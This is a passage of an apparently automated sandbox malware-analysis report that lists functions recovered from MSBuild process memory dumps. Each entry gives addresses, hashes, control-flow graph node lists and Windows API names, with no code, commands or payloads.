                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a84683590ef8ae86495a929b9fa391c11fc1ff15ecb5d8bd2587c13620d0be77
                              • Instruction ID: 528dabf3aa993db23c8822847eeb1040309726e69c35e11eda13d848ec20dd3a
                              • Opcode Fuzzy Hash: a84683590ef8ae86495a929b9fa391c11fc1ff15ecb5d8bd2587c13620d0be77
                              • Instruction Fuzzy Hash: EC02CF74A05228CFEB65DF25C844BDAFBB6BB49305F0480EAD40DAB251DB359E84CF50
                              Function 04E62C08 Relevance: .4, Instructions: 405COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a9ee6302c31def2beca095519a89b48becb553a3c4e2bf7d68276a1393e059e2
                              • Instruction ID: 52f1f40b3c2e18af9cea99056597143da5c155be8729b8061599dee779d36d1e
                              • Opcode Fuzzy Hash: a9ee6302c31def2beca095519a89b48becb553a3c4e2bf7d68276a1393e059e2
                              • Instruction Fuzzy Hash: D8020470E01218CFEB24DFA5C940BDEBBB2BF89300F1091AAD549B7294DB349A85DF54
                              Function 04E63A48 Relevance: .4, Instructions: 385COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cd17793a2102e159080d0ea42fdbd015a2c13f2996ad06e2fd61daf0d5085d22
                              • Instruction ID: ba57287e15459f81b8335b5f1432e67ac03305e8e3c4e7153774eed7b4e30673
                              • Opcode Fuzzy Hash: cd17793a2102e159080d0ea42fdbd015a2c13f2996ad06e2fd61daf0d5085d22
                              • Instruction Fuzzy Hash: 98127174E01268CFDB64DFA9C984BDDBBB2BB49300F1091AAD809A7355DB349E85CF50
                              Function 04E67988 Relevance: .4, Instructions: 364COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7e84ba8a2a1cf95573c99dfd1948f8f0a6aac457fbee63407c25795103507617
                              • Instruction ID: 09d218866fae3fd9d764bd288efa17bb0c3144065073986bb24956ffaae70e47
                              • Opcode Fuzzy Hash: 7e84ba8a2a1cf95573c99dfd1948f8f0a6aac457fbee63407c25795103507617
                              • Instruction Fuzzy Hash: A2F1C474E01218CFEB24DFA5C884B9DFBB2BF89304F1495AAD409AB355DB34A985CF50
                              Function 02618FF9 Relevance: .4, Instructions: 354COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2476c713ea6adf04a39d346713de620e02c1607360c152d04512273333b41b15
                              • Instruction ID: aaa754681fb0327b7ceb2a5b736265e47703bcece73ee95f37ca343a1caaaca0
                              • Opcode Fuzzy Hash: 2476c713ea6adf04a39d346713de620e02c1607360c152d04512273333b41b15
                              • Instruction Fuzzy Hash: DDF1BE74E01228CFEB68CF65D854BDDBBB2BB89300F1481EAD509A7294DB346E85CF51
                              Function 04E6A610 Relevance: .3, Instructions: 330COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f30b00491a2caf64f1e822ee1d77b2cd2186d2a425a825b7954c7ad32fc17b36
                              • Instruction ID: ea178c4136b9144a1543c74a706facb4cc708efa9d49d593e6f685a9e0d6caca
                              • Opcode Fuzzy Hash: f30b00491a2caf64f1e822ee1d77b2cd2186d2a425a825b7954c7ad32fc17b36
                              • Instruction Fuzzy Hash: 40E1B374E00218DFDB14DFA9D844AADBBF2FF89301F14946AE41AA7355DB34A982CF50
                              Function 05B8BA18 Relevance: .3, Instructions: 315COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2ee74a40c72839c5e6808b1d9fc8a246c2a839987973f88c588e0e88d696182b
                              • Instruction ID: ba9fa4249c2e4a975901a03f214330d963993c521f5d41afa18e65032d8382ee
                              • Opcode Fuzzy Hash: 2ee74a40c72839c5e6808b1d9fc8a246c2a839987973f88c588e0e88d696182b
                              • Instruction Fuzzy Hash: ECE1D274E01319DFDB14DFA9D884AAEFBB2FF48300F1495A9D409AB255DB34A981CF90
                              Function 04E63250 Relevance: .2, Instructions: 237COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7d512573ea986394b9a378882d304c18f3e78c6190445b09145c8355cdf46625
                              • Instruction ID: 99a1b7217fe58d2e768ad918249cdabfc71738a40ee4e57b20f0e3ba010443c9
                              • Opcode Fuzzy Hash: 7d512573ea986394b9a378882d304c18f3e78c6190445b09145c8355cdf46625
                              • Instruction Fuzzy Hash: 4CB19F74E00218DFDB54CFA9C984BADBBF2BF48304F1491AAE819A7351DB34AA45DF50
                              Function 05B89AF8 Relevance: .2, Instructions: 219COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ab7c1bbac3ea021400c7886d3e72348a3d5a35ade2fff19a9c5dde2a15bb8c2a
                              • Instruction ID: fd675e4df2e263f0e5bf55c705d6a2edd347a59d82b58c4a97a5be441ceef771
                              • Opcode Fuzzy Hash: ab7c1bbac3ea021400c7886d3e72348a3d5a35ade2fff19a9c5dde2a15bb8c2a
                              • Instruction Fuzzy Hash: 0BA19D74D05218CFDF18DFA9D944AADBBB2FF88301F10816AD809AB255DB355985CF50
                              Function 04E65D68 Relevance: .2, Instructions: 217COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e36455f0cfd1c3b73bd9508be99898e53792a9daa05e04d18cba55dd6e257df7
                              • Instruction ID: 2f9546c1da6596d367af3a9c092c119acb5a69b75b2106212ff10af01d4b08fd
                              • Opcode Fuzzy Hash: e36455f0cfd1c3b73bd9508be99898e53792a9daa05e04d18cba55dd6e257df7
                              • Instruction Fuzzy Hash: D691A575E00208DFEB05DBA5E854BAEBBB2FF8D300F14C029D9056B358DB796952CB54
                              Function 04E63A39 Relevance: .2, Instructions: 211COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b08814da90fe23b99d574aa25144bfe523c6304840d24b22a462aa0df02e5360
                              • Instruction ID: cd10e798fc6342dc693181a0b2ba0befd98b9b26ebc65dc8c1b37424953c0ac0
                              • Opcode Fuzzy Hash: b08814da90fe23b99d574aa25144bfe523c6304840d24b22a462aa0df02e5360
                              • Instruction Fuzzy Hash: CDA19675E012188FDB64DFAAC940ADDBBF2BF89300F14D1AAD809AB355D7349985CF50
                              Function 04E65758 Relevance: .2, Instructions: 202COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 21000b0dbcb772e3408156cdcaa5d6b9ffb016025f9969a8e6cb80336905fa75
                              • Instruction ID: 1b014a187544a78a5da5bf411134ef2d7c916f293d43148921d5089cb51d349a
                              • Opcode Fuzzy Hash: 21000b0dbcb772e3408156cdcaa5d6b9ffb016025f9969a8e6cb80336905fa75
                              • Instruction Fuzzy Hash: BF91A074E01218DFDB14CFA9D884ADDBBF2BF89304F10956AD819AB355DB30A981CF50
                              Function 04E60991 Relevance: .2, Instructions: 197COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 35d6dcb3fa00cbb01768e16a5ffb0c6467568d58a0ec781d9ea755344eb878eb
                              • Instruction ID: 527682a9eeca332b72742710f63f57ff98cc0548c09ec6155bcc141be37a70e9
                              • Opcode Fuzzy Hash: 35d6dcb3fa00cbb01768e16a5ffb0c6467568d58a0ec781d9ea755344eb878eb
                              • Instruction Fuzzy Hash: 81A1C4B4E012288FEB14DFA6D8547DEBBB2BF89304F1080A9D5096B394DB795A85CF50
                              Function 05B872B0 Relevance: .2, Instructions: 196COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 02b1af6370d06a60e8babe43e30191095a71e66af9a7fbf1a62896ffd9b14e77
                              • Instruction ID: 3d6b45b5e04f6025c56804046baf17ff5c433a02ea98a4c670c4fa026d310574
                              • Opcode Fuzzy Hash: 02b1af6370d06a60e8babe43e30191095a71e66af9a7fbf1a62896ffd9b14e77
                              • Instruction Fuzzy Hash: 0E816DB1D01744CBDB18DFA9C89439EBBF1FF89304F2481AAC404AB256EB759949CB91
                              Function 0261A650 Relevance: .2, Instructions: 181COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7bed549c402c7822a7d70d3c174d9dfaf50af12a5c446a561907874df8f19448
                              • Instruction ID: e55a9a77be89cf4d1e73e8ed8694c07ea2087b242fbaf41330a268512f5ef5fb
                              • Opcode Fuzzy Hash: 7bed549c402c7822a7d70d3c174d9dfaf50af12a5c446a561907874df8f19448
                              • Instruction Fuzzy Hash: 19718E74D01218CFDB18CFAAC984AEDBBB2FF49305F14916AD409AB354D7349986CF54
                              Function 04E62BF9 Relevance: .2, Instructions: 172COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 40403aab4f0aefd782f2d426ad38cc87a352ab1ec19a2d5fb2e6dcf2b42759b7
                              • Instruction ID: 0c153dd485440086b66b685b36dd0e1f33ecb819b3cced6deb2d084b0d0a5fd2
                              • Opcode Fuzzy Hash: 40403aab4f0aefd782f2d426ad38cc87a352ab1ec19a2d5fb2e6dcf2b42759b7
                              • Instruction Fuzzy Hash: 2A71F470E00218CFEB14DFAAC944BDEBBB2BF88304F1081AAD519A7355DB345A85DF54
                              Function 02613320 Relevance: .2, Instructions: 158COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 50d577df382c4dde4fe73057757655ab6b94113f3a04ab0dccd4fb9729a5274d
                              • Instruction ID: 75bd4faf8f053f86ecc5723064e461e6d810e5f55b39634955e5e684fcb00a50
                              • Opcode Fuzzy Hash: 50d577df382c4dde4fe73057757655ab6b94113f3a04ab0dccd4fb9729a5274d
                              • Instruction Fuzzy Hash: 0C615375E056188BDB29CF6AC980A89FBF7AFC9300F15D1E9D40DA7215DB30AA81CF54
                              Function 04E64A58 Relevance: .1, Instructions: 145COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4e28c9a71a008650ec003b8bb073d43075f65b9ce144ac0a11efd92c3ae1545d
                              • Instruction ID: e06a81937b3dd6e57235454f17d7e725059fa0b51581026d3982f063a4017a58
                              • Opcode Fuzzy Hash: 4e28c9a71a008650ec003b8bb073d43075f65b9ce144ac0a11efd92c3ae1545d
                              • Instruction Fuzzy Hash: 2251B274E45208CBDB14DFAAD9806EDFBF6BF89300F14A129D405AB294DB35A942CF54
                              Function 02612043 Relevance: .1, Instructions: 143COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d3e0dead0b4a2d2dc1cc474978158e48b36a71482559f9e506797b4db35d3e92
                              • Instruction ID: 04951f74ca718dbf0fe5a2d9f462afdccf38ad9d52577ac8d330d141e6c228e4
                              • Opcode Fuzzy Hash: d3e0dead0b4a2d2dc1cc474978158e48b36a71482559f9e506797b4db35d3e92
                              • Instruction Fuzzy Hash: 5351B175E00248DFDB08DFE5D894A9DBBB2FF89300F24812AE815AB365DB345942DF60
                              Function 05B86010 Relevance: .1, Instructions: 125COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7403c9213965cf471abd2be6a64a918a7cafb26e629f4149fe800a9fce35b518
                              • Instruction ID: fe601230a7b7332e87fdd8ea5089a64cddb7b9441b4fbcb806cf2e31ad31e4bb
                              • Opcode Fuzzy Hash: 7403c9213965cf471abd2be6a64a918a7cafb26e629f4149fe800a9fce35b518
                              • Instruction Fuzzy Hash: 3A51D771E012289FEB28DF6AD8557DDBBB2BF89300F54C0AAD409AB254DB301A85CF51
                              Function 0261DBD0 Relevance: .1, Instructions: 106COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 879b9232171b2d14d98099cb8f68d0ec3e9a7bc6731448ecdeead311f84e76ca
                              • Instruction ID: e9a94744d655f6e05e6a60fd1f39d2b37f6da61db52a61273f8bd6a890dc35db
                              • Opcode Fuzzy Hash: 879b9232171b2d14d98099cb8f68d0ec3e9a7bc6731448ecdeead311f84e76ca
                              • Instruction Fuzzy Hash: D7419B71D056698BDB69CF67CC447DABAB7AFC9300F04C0FA941CA6264DB741A85CF40
                              Function 05B8F7E8 Relevance: .1, Instructions: 105COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 81e2fe5a8a07b691507794e4d3a1ad470fe04b82f214a2dbcd7524de9773698a
                              • Instruction ID: 79acd9f3cb1cb537362025ed2ed27b878450bd259c13895711a331511d0e8bdc
                              • Opcode Fuzzy Hash: 81e2fe5a8a07b691507794e4d3a1ad470fe04b82f214a2dbcd7524de9773698a
                              • Instruction Fuzzy Hash: 4B41EF74D00218DFCB04DFA9D844AADBBB2FF49310F08A5A9E415BB261D735A982CF44
                              Function 05B881E8 Relevance: 3.9, Strings: 3, Instructions: 183COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 132 5b881e8-5b881f1 133 5b881fe-5b88244 132->133 134 5b881f3-5b881fd call 5b86e80 132->134 141 5b882d9-5b8834a 133->141 142 5b8824a-5b88275 133->142 160 5b8834c-5b8836b call 5b8719c 141->160 161 5b8836d-5b88379 141->161 182 5b88277 call 5b881e8 142->182 183 5b88277 call 5b881da 142->183 147 5b8827d-5b882d8 call 5b87154 call 5b87164 172 5b883a7-5b883ad 160->172 162 5b8837b 161->162 163 5b88385-5b883a0 call 5b871ac 161->163 162->163 173 5b883a5 163->173 174 5b883af-5b883b1 172->174 175 5b883b3 172->175 173->172 176 5b883b5-5b883f6 call 5b871bc 174->176 175->176 181 5b883fb-5b88404 176->181 182->147 183->147
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: C%$[#$k$
                              • API String ID: 0-2478663196
                              • Opcode ID: 5f336823ffe2d996aa72793c821a656162ba4983c4d0f0e4ade500afa3c8775c
                              • Instruction ID: 9f05a90ccd124a986e9f4e22d7a7f8fef1f6207e545149938327b1e22ff41569
                              • Opcode Fuzzy Hash: 5f336823ffe2d996aa72793c821a656162ba4983c4d0f0e4ade500afa3c8775c
                              • Instruction Fuzzy Hash: 5851C0317043459FC705AB78C880B7EBBE6EF85210F6489A9E40ADB792DE71ED05C7A1
                              Function 04E64C20 Relevance: 1.7, APIs: 1, Instructions: 166libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1408 4e64c20-4e64c3a 1409 4e64c41-4e64cb2 1408->1409 1410 4e64c3c 1408->1410 1414 4e64cb4 1409->1414 1415 4e64cb9-4e64cc7 1409->1415 1410->1409 1414->1415 1416 4e64cce-4e64ce1 1415->1416 1417 4e64cc9 1415->1417 1418 4e64e2a-4e64e33 1416->1418 1417->1416 1419 4e64ce6-4e64cef 1418->1419 1420 4e64e39-4e64e6f 1418->1420 1421 4e64cf6-4e64d39 LdrInitializeThunk 1419->1421 1422 4e64cf1 1419->1422 1427 4e64e81-4e64ea8 1420->1427 1428 4e64e71-4e64e80 1420->1428 1426 4e64d40-4e64d5a 1421->1426 1422->1421 1429 4e64d94-4e64da9 1426->1429 1430 4e64d5c-4e64d92 1426->1430 1428->1427 1432 4e64dab-4e64daf 1429->1432 1430->1432 1435 4e64db1-4e64dba 1432->1435 1436 4e64dbb 1432->1436 1435->1436 1436->1418
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 42e380ce3d86de7aaa405e4f7a700a89080ec1c431e6729c016f07fe7d156990
                              • Instruction ID: c76cfd139b1a45766a3558c55d761497d087befb4c34661a898ade10677740c8
                              • Opcode Fuzzy Hash: 42e380ce3d86de7aaa405e4f7a700a89080ec1c431e6729c016f07fe7d156990
                              • Instruction Fuzzy Hash: 4C61D174E41218DFDB18DFA9D584A9EFBF2BF89300F24912AD405AB394DB34A942CF54
                              Function 04E6C7C8 Relevance: 1.7, APIs: 1, Instructions: 159libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1440 4e6c7c8-4e6c7ea 1441 4e6c7f1-4e6c868 LdrInitializeThunk 1440->1441 1442 4e6c7ec 1440->1442 1444 4e6c94c-4e6c955 1441->1444 1442->1441 1445 4e6c86d-4e6c876 1444->1445 1446 4e6c95b-4e6c977 1444->1446 1447 4e6c87d-4e6c8a1 1445->1447 1448 4e6c878 1445->1448 1451 4e6c9bb-4e6c9c2 1446->1451 1452 4e6c979-4e6c9ba 1446->1452 1453 4e6c8a3-4e6c8ea 1447->1453 1454 4e6c8eb-4e6c949 1447->1454 1448->1447 1452->1451 1453->1454 1454->1444
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: f45b0083cafd5bf62ebaab52cae8db38baab3d34a11ec13cfbb7edf11b5d1378
                              • Instruction ID: 9040416c6fb57e5fa7bb197d885176e072829861dc4b90bfbc1340bb9412845b
                              • Opcode Fuzzy Hash: f45b0083cafd5bf62ebaab52cae8db38baab3d34a11ec13cfbb7edf11b5d1378
                              • Instruction Fuzzy Hash: BD7189B5E01208DFCB14DFA9D584ADEBBF2BF89300F24916AE815AB354D735A941CF50
                              Function 04E6C3D0 Relevance: 1.6, APIs: 1, Instructions: 139libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1516 4e6c3d0-4e6c3ea 1517 4e6c3f1-4e6c442 1516->1517 1518 4e6c3ec 1516->1518 1520 4e6c444 1517->1520 1521 4e6c449-4e6c457 1517->1521 1518->1517 1520->1521 1522 4e6c45e-4e6c471 1521->1522 1523 4e6c459 1521->1523 1524 4e6c5da-4e6c5e3 1522->1524 1523->1522 1525 4e6c476-4e6c47f 1524->1525 1526 4e6c5e9-4e6c603 1524->1526 1527 4e6c486-4e6c4c9 LdrInitializeThunk 1525->1527 1528 4e6c481 1525->1528 1531 4e6c4d0-4e6c4dc 1527->1531 1528->1527 1532 4e6c4de-4e6c4e1 1531->1532 1533 4e6c4eb-4e6c505 1531->1533 1532->1533 1534 4e6c507-4e6c542 1533->1534 1535 4e6c544-4e6c559 1533->1535 1536 4e6c55b-4e6c55f 1534->1536 1535->1536 1538 4e6c561-4e6c56a 1536->1538 1539 4e6c56b 1536->1539 1538->1539 1539->1524
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: aab149b336a7127b15bb1b1a05a9dcfd4c54b3c814a88b62c42912d4696c391e
                              • Instruction ID: 9830f7949dd71fc4ea2c556cbc9daddde875dc2f6f23564249488351ea8d8707
                              • Opcode Fuzzy Hash: aab149b336a7127b15bb1b1a05a9dcfd4c54b3c814a88b62c42912d4696c391e
                              • Instruction Fuzzy Hash: CE51C1B4E40208DFDB08DFA9D584ADEFBF2BF89304F249129E415AB255DB34A846CF54
                              Function 0261CB78 Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1542 261cb78-261cc60 DuplicateHandle 1545 261cc62-261cc68 1542->1545 1546 261cc69-261ccb7 1542->1546 1545->1546
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,00000000,?,?,00000000,?), ref: 0261CC50
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 1b6f5a4cf9c62d5fd8a9cf50c2b3dd2edd3bb3ba3b0af8be15f5a3c8b660aefb
                              • Instruction ID: 29f15ca712f8a2943cfd5f7f85980dd82ede5aa1870a81273ea4a4318c332268
                              • Opcode Fuzzy Hash: 1b6f5a4cf9c62d5fd8a9cf50c2b3dd2edd3bb3ba3b0af8be15f5a3c8b660aefb
                              • Instruction Fuzzy Hash: 064189B9D042589FDF00CFA9D580AEEFBF1BB0A310F14A06AE914B7210D375A945CF64
                              Function 0261A568 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1550 261a568-261cc60 DuplicateHandle 1553 261cc62-261cc68 1550->1553 1554 261cc69-261ccb7 1550->1554 1553->1554
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,00000000,?,?,00000000,?), ref: 0261CC50
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: c33759515ba6de5ab203230350bbd06ee29413cf1ba52b8b8b5a9c891b973330
                              • Instruction ID: df5fa7450f3493f22e95eedf66db889226afd2e7e966ac6764125a112c24c641
                              • Opcode Fuzzy Hash: c33759515ba6de5ab203230350bbd06ee29413cf1ba52b8b8b5a9c891b973330
                              • Instruction Fuzzy Hash: BD4187B9D042589FDF00CFA9D984AEEFBF1BB09310F14A06AE814BB210D375A945CF64
                              Function 0261D228 Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1558 261d228-261d230 1559 261d221-261d224 1558->1559 1560 261d232-261d25a 1558->1560 1562 261d261-261d2c3 call 2610a4c * 2 1560->1562 1563 261d25c 1560->1563 1568 261d2c8-261d2f1 LdrInitializeThunk call 2610a4c 1562->1568 1563->1562 1570 261d2f6-261d33c call 2610a5c 1568->1570 1575 261d35b-261d370 1570->1575 1576 261d33e-261d359 1570->1576 1577 261d372-261d376 1575->1577 1576->1577 1578 261d382 1577->1578 1579 261d378-261d381 1577->1579 1580 261d383 1578->1580 1579->1578 1580->1580
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: c2ebb3fc521f76123baa6b8d22afb346db40135e6cc340308f7974792c93febb
                              • Instruction ID: 468f5018c916e854eb26d7ceb537c77cd52a0a7fe51e78f39ec6730fd643ec06
